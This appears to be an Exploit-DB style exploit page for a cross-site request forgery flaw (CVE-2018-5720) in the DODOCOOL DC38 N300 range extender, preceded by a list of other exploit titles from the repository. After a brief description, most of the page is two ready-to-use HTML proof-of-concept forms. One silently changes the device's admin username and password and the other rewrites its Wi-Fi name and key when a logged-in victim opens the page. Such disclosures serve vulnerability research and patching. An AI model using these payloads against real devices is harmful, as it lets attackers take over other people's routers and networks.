bd1b51b595
9 changes to exploits/shellcodes RAVPower 2.000.056 - Memory Disclosure Acunetix WVS 10 - Local Privilege Escalation NoMachine 5.3.9 - Local Privilege Escalation Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1) Acunetix WVS 10 - Remote Command Execution Exodus Wallet (ElectronJS Framework) - Remote Code Execution BMC BladeLogic 8.3.00.64 - Remote Command Execution Vodafone Mobile Wifi - Reset Admin Password Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution ASUS DSL-N14U B1 Router 1.1.2.3_345 - Change Administrator Password Telerik UI for ASP.NET AJAX 2012.3.1308 < 2017.1.118 - Encryption Keys Disclosure Telerik UI for ASP.NET AJAX 2012.3.1308 < 2017.1.118 - Arbitrary File Upload Dodocool DC38 N300 - Cross-site Request Forgery WordPress Plugin Learning Management System - 'course_id' SQL Injection Linux/x86 - Disable ASLR Security + Obfuscated Shellcode (23 bytes)
75 lines
No EOL
3.2 KiB
HTML
75 lines
No EOL
3.2 KiB
HTML
# Exploit Title: DODOCOOL DC38 N300 Cross-site Request Forgery
|
|
# Date: 17-01-2018
|
|
# Exploit Authors: Raffaele Sabato
|
|
# Contact: https://twitter.com/syrion89
|
|
# Vendor: DODOCOOL
|
|
# Vendor Homepage: www.dodocool.com
|
|
# Version: RTN2-AW.GD.R3465.1.20161103
|
|
# CVE: CVE-2018-5720
|
|
|
|
I DESCRIPTION
|
|
========================================================================
|
|
|
|
An issue was discovered in DODOCOOL DC38 3-in-1 N300 Mini Wireless Range
|
|
Extend RTN2-AW.GD.R3465.1.20161103 devices. A Cross-site request forgery
|
|
(CSRF) vulnerability allows remote attackers to hijack the authentication
|
|
of users for requests that modify the configuration.
|
|
This vulnerability may lead to username and/or password changing, Wi-Fi
|
|
password changing, etc.
|
|
|
|
II PROOF OF CONCEPT
|
|
========================================================================
|
|
|
|
## Change user username and password (test_username:test_password):
|
|
|
|
<html>
|
|
<body>
|
|
<script>history.pushState('', '', '/')</script>
|
|
<form action="http://192.168.10.1/boafrm/formPasswordSetup"
|
|
method="POST">
|
|
<input type="hidden" name="submit-url"
|
|
value="/setok.htm?bw=main.htm" />
|
|
<input type="hidden" name="submit-value" value="" />
|
|
<input type="hidden" name="username" value="test_username" />
|
|
<input type="hidden" name="newpass" value="test_password" />
|
|
<input type="hidden" name="confpass" value="test_password" />
|
|
<input type="submit" value="Submit request" />
|
|
</form>
|
|
</body>
|
|
</html>
|
|
|
|
|
|
## Change WiFi Configuration (WIFI_TEST:TestTest):
|
|
|
|
<html>
|
|
<body>
|
|
<script>history.pushState('', '', '/')</script>
|
|
<form action="http://192.168.10.1/boafrm/formWlanSetupREP"
|
|
method="POST">
|
|
<input type="hidden" name="submit-url"
|
|
value="/setok.htm?bw=wl_rep.htm" />
|
|
<input type="hidden" name="submit-value" value="repset" />
|
|
<input type="hidden" name="wl_onoff" value="0" />
|
|
<input type="hidden"
|
|
name="wps_clear_configure_by_reg" value="0" />
|
|
<input type="hidden" name="wlProfileId" value="" />
|
|
<input type="hidden" name="wl_mode" value="0" />
|
|
<input type="hidden" name="wl_authType" value="auto" />
|
|
<input type="hidden" name="wepEnabled" value="ON" />
|
|
<input type="hidden" name="weplength" value="" />
|
|
<input type="hidden" name="wepformat" value="" />
|
|
<input type="hidden" name="wl_wpaAuth" value="psk" />
|
|
<input type="hidden" name="wl_pskFormat" value="0" />
|
|
<input type="hidden" name="wl_pskValue" value="TestTest" />
|
|
<input type="hidden" name="wl_ssid" value="WIFI_TEST" />
|
|
<input type="hidden" name="wl_Method" value="6" />
|
|
<input type="hidden" name="wep_key" value="" />
|
|
<input type="hidden" name="ciphersuite" value="tkip+aes" />
|
|
<input type="hidden" name="ciphersuite" value="aes" />
|
|
<input type="hidden" name="wpa2ciphersuite" value="tkip+aes" />
|
|
<input type="hidden" name="wpa2ciphersuite" value="aes" />
|
|
<input type="hidden" name="web_pskValue" value="TestTest" />
|
|
<input type="submit" value="Submit request" />
|
|
</form>
|
|
</body>
|
|
</html> |